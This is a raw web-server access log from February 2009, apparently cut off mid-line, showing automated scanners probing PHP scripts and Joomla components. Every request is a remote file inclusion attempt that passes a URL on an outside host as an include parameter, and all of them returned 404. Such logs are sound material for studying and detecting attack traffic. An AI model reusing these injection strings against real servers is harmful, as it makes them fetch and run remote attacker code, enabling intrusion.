65.98.28.210 - - [05/Feb/2009:06:14:55 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
64.18.194.51 - - [05/Feb/2009:06:14:57 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:06:14:57 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.232.66.107 - - [05/Feb/2009:06:15:10 -0600] "GET /logs/access_log.1211241600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:06:15:10 -0600] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:06:15:10 -0600] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:06:15:15 -0600] "GET /logs/access_log.1210550400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [05/Feb/2009:06:15:49 -0600] "GET /logs/access_log.1214524800//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.98.28.210 - - [05/Feb/2009:06:15:55 -0600] "GET /logs/access_log.1219017600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
88.191.95.106 - - [05/Feb/2009:06:16:34 -0600] "GET /logs/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:06:16:34 -0600] "GET /htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:06:16:38 -0600] "GET /logs/access_log.1215216000/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:06:16:38 -0600] "GET /logs/access_log.1215129600/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:06:16:50 -0600] "GET /logs/access_log.1215216000%20%20/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:06:16:54 -0600] "GET /logs/access_log.1215129600%20%20/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.98.28.210 - - [05/Feb/2009:06:16:59 -0600] "GET /logs//inc